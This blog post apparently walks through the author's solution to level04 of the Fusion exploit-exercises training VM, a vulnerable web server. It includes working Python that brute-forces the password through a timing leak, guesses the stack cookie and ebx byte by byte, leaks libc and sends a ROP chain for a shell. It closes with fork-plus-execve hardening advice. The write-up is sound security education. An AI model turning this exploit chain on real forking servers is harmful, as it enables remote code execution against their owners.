Wednesday, March 13, 2013

Fusion 04 exploit write-up

Last week I started playing with the exploit exercises from the Fusion VM at exploit-exercises.com. The first level was a straightforward stack overflow without any mitigations. Next came one with ASLR for the stack, which was easy to bypass with a simple jmp *esp found in the main binary. Next level up added NX, so I had to resort to ROP, which was also simple by using ROPGadget to generate a payload based off libc (and fixing up the chain due to a bug in ROPGadget 3.3).

Now, level04 was slightly more difficult. It is a web server compiled with stack cookies (SSP), position independent code (PIC/PIE) and configured to run with ALSR and NX. So this gives us a few protections we need to bypass or work around somehow.

Because of this, I thought it was interesting to share and maybe request some feedback... who knows, maybe there are easier solutions and I am just complicating my life :) You can also find a copy of this post at my personal blog

Additionally, the web server generates a random password which you need to provide in order to hit the vulnerability and control the instruction pointer. Looking at the validate_credentials function, we see this code:

int validate_credentials(char *line)
{
  char *p, *pw;
  unsigned char details[2048];
  int bytes_wrong;
  int l;
  struct timeval tv;
  int output_len;


  memset(details, 0, sizeof(details));

  output_len = sizeof(details);

  p = strchr(line, '\n');
  if(p) *p = 0;
  p = strchr(line, '\r');
  if(p) *p = 0;

  // printf("%d\n", strlen(line));
  base64_decode(line, strlen(line), details, &output_len);
  // printf("%s -> %s\n", line, details);
  // fflush(stdout);
  
  p = strchr(details, ':');
  pw = (p == NULL) ? (char *)details : p + 1;

  for(bytes_wrong = 0, l = 0; pw[l] && l < password_size; l++) {
    if(pw[l] != password[l]) {
      
#if 0
      char *buf;
      asprintf(&buf, "[%d] wrong byte (%02x vs %02x)\n", l,
                          password[l], pw[l]);
      write(58, buf, strlen(buf));
#endif
      
      bytes_wrong++;
    }
  }

  // anti bruteforce mechanism. good luck ;>
  
  tv.tv_sec = 0;
  tv.tv_usec = 2500 * bytes_wrong;

  select(0, NULL, NULL, NULL, &tv);

  // printf("%d bytes wrong!\n", bytes_wrong);

  if(l < password_size || bytes_wrong) 
    send_error(401, "Unauthorized", 
    "WWW-Authenticate: Basic realm=\"stack06\"",
    "Unauthorized");

  return 1;
}
So there is a clear timing leak on line 208 which tells you how many bytes were wrong. Additionally, the base64_decode function seems to take the length of the output buffer but then this is what it does with it:

void base64_decode(const char *data,
                    size_t input_length,
                    unsigned char *output,
                    size_t *output_length) {

    if (decoding_table == NULL) build_decoding_table();

    // printf("data: %p, input_length: %d, output: %p, output_length: %p\n",
    // data, input_length, output, output_length);

    if ((input_length % 4) != 0) {
  // printf("len % 4 = fail\n");
  return;
    }

    *output_length = input_length / 4 * 3;
So, it just overwrites it with the computed output buffer and goes ahead and decodes it. Thus, we have a stack based buffer overflow but in order to exploit it we first need to recover the random password so that the function returns and uses the pops the return address off the stack.

Discovering the password is fairly easy thanks to the timing leak: we just brute force byte by byte, measuring the time to see if we found the right character or not. In my case, the timing difference is below 0.001 when we hit a good value and above it when we do not, so I just check for that:

def check_password(s, password):
 req = "GET / HTTP/1.0\r\nAuthorization: Basic %s\r\n\r\n" % base64.b64encode("stack06:"+password)
 s.send(req)
 resp = ""
 resp = resp + s.recv(1024)
 auth = "Unauthorized" not in resp
 return (auth, resp)

# First find auth password
def find_next_char(password):
 done = False
 for current_char in string.ascii_letters+string.digits:
  s =  get_connection(ip,port)

  t0 = time.time()
  found,resp = check_password(s, password+current_char)
  t1 = time.time()
  s.close()

  #If found or time indicates current char is good...
  if found or (t1-t0) < 0.001:
   print "[*] Found character %d = %s" %(len(password)+1,current_char)
   return (found,password+current_char)

 return (False,password)

def find_password():
 password = ""
 found = False
 
 while(not found) and len(password)<16:
  (found,password) = find_next_char(password)
 return password
So this piece will find us the password. What's next? Well, we can use this to overwrite some data and hopefully hijack EIP. But... as I mentioned above, there is a catch: there is a stack cookie protecting EIP.

Since we can feed any binary data of any size (thanks base64 decode :) ), we can brute force the stack cookie byte by byte. When we see a stack corruption, we guessed an incorrect value. When the program goes on normally, we hit the right result. Again, this is the code implementing that part:

def find_cookie(password,cookie = ""):
 while len(cookie)!=4:
  for i in xrange(256):
   # print "[*] Test ", i
   s = get_connection(ip,port)
   found,resp = check_password(s,password + "A"*2024+ cookie + chr(i))
   if "smashing" not in resp:
    # print resp
    cookie = cookie + chr(i)
    print "[*] Cookie value is 0x%s" % cookie.encode("hex")
    break
   else:
    print resp
   s.close()
 return cookie
At this point, we can reliably set EIP since we know the stack cookie value. However, that's not very helpful since everything is randomized thanks to full ASLR and a PIC binary. The first thing I tried here was overwriting the last byte of the saved EIP to land on a call to printf() or some other function returning data. This would help me obtain some data from the stack, and then I could create a ROP payload based on the leaked data.

However, then I hit another problem: ebx is used by the code to contain a reference to the binary loading address + some offset. This is done to achieve position independent code. Unfortunately, the exploit also overwrites ebx, which was stored by validate_credentials just between the stack cookie and the return address.

So what I did next was guessing ebx in the same way I did for the stack cookie. However, here I started with the known last byte (the lowest 12 bits of the binary are not randomized) and brute forced the rest. Again, the code is very similar to the previous one:

def find_ebx(password,cookie):
 ebx = ""
 s = get_connection(ip,port)
 found,base_resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3)
 s.close()
 while len(ebx)<4:
  for i in xrange(0,256):
   try:
    s = get_connection(ip,port)
    found,resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3 + ebx + chr(i) )
    s.close()
    if resp == base_resp:
     ebx = ebx + chr(i)
     print "[*] ebx value is 0x%s" % ebx[::-1].encode("hex")
     break
   except socket.error:
    # print "[*] Fail"
    pass
  if i==255:
   print "[*] Could not discover ebx value. Exploit failed."
   sys.exit(-1)
 return ebx
This code first obtains a 'normal response'. Next, it starts bruteforcing ebx byte by byte, comparing the response with the 'expected response'. If it matches, the right value was found, else it iterates to the next candidate.

Now, with this done we are able to compute the base for the binary by subtracting 0x4118 from the leaked ebx value. After finishing the exploit I realized that this was actually not needed, since the stack smashing detection code prints out a very helpful memory map into stderr, which is redirected to our socket. Anyway, with this code the exploit doesn't rely on that leak so it would work even if stderr is not redirected to our socket.

At this point I had two options: use this to leak the libc or make a ROP payload based on the binary. Since I already had a payload for libc made with help of ROPGadget (which I had to correct due to some bug by the way), I decided to return into write and leak the first GOT entry to obtain the libc base. Therefore, the final stages of my exploit look like this:

base = struct.unpack("<I", ebx)[0] - 0x22FF - 0x1E19
write_plt = struct.pack("<I",base + 0xF30 ) #write PLT entry
got_base = struct.pack("<I",base + 0x4124 ) # GOT start

print "[*] Binary base: 0x%.8x . Leaking libc base" % base
print "[*] PLT entry for printf @ ", write_plt[::-1].encode('hex')
print "[*] GOT start @ ", got_base[::-1].encode("hex")

s =  get_connection(ip,port)
found,resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3 + ebx + "AAAA"*3 + write_plt + "AAAA" + "\x01\x00\x00\x00" + got_base + "\x04\x00\x00\x00")
s.close()
libc = struct.unpack("<I", resp[:4])[0] - 0xd3a70
print "[*] Discovered libc base: 0x%.8x" % libc 

print "[*] Launching ROP exploit"
p = get_rop(libc)
s =  get_connection(ip,port)
found,resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*7 + p)
After this, a nice shell is running for us. With only one catch: an alarm is set by the webserver, and it will trigger a SIGALRM signal soon. So what I do is just executing trap '' SIGALRM; as a first command so that the signal is ignored. The full exploit code is here for you to play with :)

Conclusion

Even in the presence of quite some countermeasures (fully randomized addres space, non-executable data areas, stack smash protection), it is still possible to achieve reliable code execution.

In this case, we have abused the fact that the vulnerable server does not call execve() for every new child to brute-force the stack cookie and also to discover the base address of the executable itself. After this is done, it is basically game over.

However, these techniques have two requirements: the address space has to remain constant between requests (albeit random every time we restart the whole server) and we need to be able to partially corrupt the data with fully arbitrary values. If these requirements were not met, another info-leak bug would have been required in order to obtain this data.

Thus, as an application programmer it is always recommended to call fork()+execve() instead of just fork(), so that the OS re-randomizes the whole address space.